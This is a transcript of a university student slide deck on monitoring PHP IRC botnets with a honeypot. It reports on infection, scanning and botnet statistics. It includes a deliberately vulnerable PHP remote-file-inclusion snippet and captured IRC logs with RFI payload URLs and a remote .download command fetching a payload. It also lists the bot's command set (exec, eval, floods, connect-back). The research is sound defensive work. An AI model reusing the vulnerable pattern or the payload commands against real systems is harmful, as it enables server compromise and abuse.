+ All Categories
Home > Documents > Monitoring botnets from within

Monitoring botnets from within

Date post: 25-Feb-2016
Category:
Upload: hall
View: 50 times
Download: 0 times
Share this document with a friend
Description:
Technion - Israel Institute of Technology COMPUTER SCIENCE DEPARTMENT Project  in  Computer Security (236349). Monitoring botnets from within. Students: Yevgeni Sabin, Alexander Chigirintsev Supervisor: Amichai Shulman. Background. - PowerPoint PPT Presentation
22
Monitoring botnets from within Students: Yevgeni Sabin, Alexander Chigirintsev Supervisor: Amichai Shulman Technion - Israel Institute of Technology COMPUTER SCIENCE DEPARTMENT Project in Computer Security (236349)
Transcript
Page 1: Monitoring botnets from within

Monitoring botnets from within

Students: Yevgeni Sabin, Alexander ChigirintsevSupervisor: Amichai Shulman

Technion - Israel Institute of TechnologyCOMPUTER SCIENCE DEPARTMENT

Project in Computer Security (236349)

Page 2: Monitoring botnets from within

Background

Botnet – a group of computers infected by malicious code, connected to the Internet and controlled by attacker via command and control center (IRC server).In our case infected machines are web servers.

Page 3: Monitoring botnets from within

Background

RFI – remote file inclusion is a type of attack in which “dynamic file include” mechanism is exploited. Attacker includes malicious code, and takes control over the server.

$url=$_SERVER['REQUEST_URI'];$file = parse_url($url, PHP_URL_QUERY);include $file

Page 4: Monitoring botnets from within

Methodology

Setup: Virtual Machine (VMware) on home

PC: OS: Windows XP SP3 Apache HTTP server + PHP 5.3 Mail Server Simple vulnerable site Wireshark

Page 5: Monitoring botnets from within

Methodology

• Links to malicious code were received from supervisor or found on the Internet. Each link were remotely included in our fake site.

• All network communication were recorded by network analyzer and analyzed later.

Page 6: Monitoring botnets from within

Infection process

IRCFind a victim

Page 7: Monitoring botnets from within

IRC Command and Control Server

Page 8: Monitoring botnets from within

Finding vulnerable servers

:[email protected] PRIVMSG #b0yz :!rfi /index.php?DOCUMEN_ROOT= "netcat_files“

Page 9: Monitoring botnets from within

Finding vulnerable servers

:[email protected] PRIVMSG #b0yz :!rfi /index.php?DOCUMEN_ROOT= "netcat_files“

:[email protected] PRIVMSG #b0yz :.9,1[.15rfi.9] .[AsK] 403 :[email protected] PRIVMSG #b0yz :.9,1[.15rfi.9] .[SaPo] 1055 :[email protected] PRIVMSG #b0yz :.9,1[.15rfi.9] .[oNeT] 52 :[email protected] PRIVMSG #b0yz :.9,1[.15rfi.9] .[YahOo] 1222

:[email protected] PRIVMSG #b0yz :.9,1[.15rfi.9]([email protected]).10 http://www.bsau.ru//index.php?DOCUMEN_ROOT=http://tj9.fileave.com/bot.txt?? ([email protected]).

:[email protected] PRIVMSG #b0yz :.9,1[.15rfi.9]([email protected]).10 http://vestnik.bsau.ru//index.php?DOCUMEN_ROOT=http://tj9.fileave.com/bot.txt?? ([email protected]).

:[email protected] PRIVMSG #b0yz :.9,1[.15rfi.9]([email protected]).10 http://www.bowling.ru/netcat_files/319/189/h_47768a1cadfac385d61ce9db4ec06c51//index.php?DOCUMEN_ROOT=http://tj9.fileave.com/bot.txt?? ([email protected]).

Page 10: Monitoring botnets from within

What infected machine can do?* COMMANDS:** .user <password> //login to the bot* .logout //logout of the bot* .die //kill the bot* .restart //restart the bot* .mail <to> <from> <subject> <msg> //send an email* .dns <IP|HOST> //dns lookup* .download <URL> <filename> //download a file* .exec <cmd> // uses exec() //execute a command* .sexec <cmd> // uses shell_exec() //execute a command* .cmd <cmd> // uses popen() //execute a command* .info //get system information* .php <php code> // uses eval() //execute php code* .tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack* .udpflood <target> <packets> <packetsize> <delay> //udpflood attack* .raw <cmd> //raw IRC command* .rndnick //change nickname* .pscan <host> <port> //port scan* .safe // test safe_mode (dvl)* .inbox <to> // test inbox (dvl)* .conback <ip> <port> // conect back (dvl)* .uname // return shell's uname using a php function (dvl)*/

• Sending spam• DDoS attack• Test for vulnerabilities•Download and execude

Page 11: Monitoring botnets from within

Getting direct access to the server

Example: http://buyskie.sytes.net/back.php

:[email protected] MODE #preman +v [A]b0yz848:[email protected] PRIVMSG #preman :.user setanPRIVMSG #preman :[.Auth.]: OK b0yz_JbX You Are Ready... My OwnER !!!!!!!!!!!!!!!!!!!!:[email protected] PRIVMSG #preman :.infoPRIVMSG #preman :[.info.]: Windows NT MYSEREVE-E176B7 5.1 build 2600 (Windows XP Professional Service Pack 3) i586 (safe: off)PRIVMSG #preman :[.vuln.]: http://buyskie.co.il/redirecter.php?http://95.154.24.14:32000//accounts/inc/admin/apache.jpg:[email protected] PRIVMSG #preman :.download http://95.154.24.14:32000//accounts/inc/admin/ipays.jpg mail.phpPRIVMSG #preman :[.download.]: Arquivo .http://95.154.24.14:32000//accounts/inc/admin/ipays.jpg. baixado para .mail.php.

Page 12: Monitoring botnets from within

Botnet example

• Botnet #rafflesia (by room name)• Monitoring time: 5 days• number of bots: ~150• Joins per day: ~60• Leaves per day: ~70 • Number of bots on same system: ~3 • Maximal bots on same system: 37 ( hetzner.de – VDS provider )

Page 13: Monitoring botnets from within

Botnet example

~150 participants

scanners

Page 14: Monitoring botnets from within

Botnet example

• Botnet #rafflesia (by room name)• Number of scanners: 6• Can look for ~15 vulnerabilities:

– RFI, LFI, SQL injection, Word Press– osCommerce, Zen Cart® Ecommerce ,e107 and more

Page 15: Monitoring botnets from within

Botnet example

• Botnet #rafflesia (by room name)• Number of scanners: 6• Can look for ~15 vulnerabilities:

– RFI, LFI, SQL injection, Word Press– osCommerce, Zen Cart® Ecommerce ,e107 and more

• Search engines in use: 32– GooGLe, ReDiff, Bing, ALtaViSTa, AsK, UoL, CluSty, GutSer, ExaLead, VirgiLio, WebDe, AoL,

SaPo, DuCk, YauSe, BaiDu, KiPoT, GiBLa, YahOo, HotBot, LyCos, LyGo, BLacK, oNeT, SiZuka, WaLLa, DeMos, RoSe, SeZnaM, TisCali, NaVeR

Page 16: Monitoring botnets from within

Botnet example

• Botnet #rafflesia (by room name)• Number of scanners: 6• Can look for ~15 vulnerabilities:

– RFI, LFI, SQL injection, Word Press– osCommerce, Zen Cart® Ecommerce ,e107 and more

• Search engines in use: 32– GooGLe, ReDiff, Bing, ALtaViSTa, AsK, UoL, CluSty, GutSer, ExaLead, VirgiLio, WebDe, AoL,

SaPo, DuCk, YauSe, BaiDu, KiPoT, GiBLa, YahOo, HotBot, LyCos, LyGo, BLacK, oNeT, SiZuka, WaLLa, DeMos, RoSe, SeZnaM, TisCali, NaVeR

• Scans per day: 48• Looked for vulnerabilities: Word Press (88%), RFI (12%) • Vulnerable sites found per day: ~155

Page 17: Monitoring botnets from within

Botnet example

• Botnet #rafflesia (by room name)Vulnerable sites found per day: ~155

Page 18: Monitoring botnets from within

Compromised site example

Page 19: Monitoring botnets from within

Compromised site example

Page 20: Monitoring botnets from within

Compromised site example

Page 21: Monitoring botnets from within

Conclusions1. Main usage of PHP botnets is searching and infecting vulnerable sites.

PHP botnet gives good ready-to-use infrastructure for this purpose.2. Almost no “traditional” activity of botnets were observed. Traditional

attacks as DDoS is hard to make due to low number of participants.3. Low variety of bots used (manly “pBot”). Most of their functionality is

not used.4. Known (old) vulnerabilities used to infect the systems – only sites that are

not maintained well can be infected.

Page 22: Monitoring botnets from within

Further steps1. Improve the honey pot – more realistic site, that holds interesting

information for attacker. Small online store is very attractive for hackers.2. Try to infect the system in the normal way the botnets do - thru the

scanners (get to Google search results).3. More observation time (few weeks)


Recommended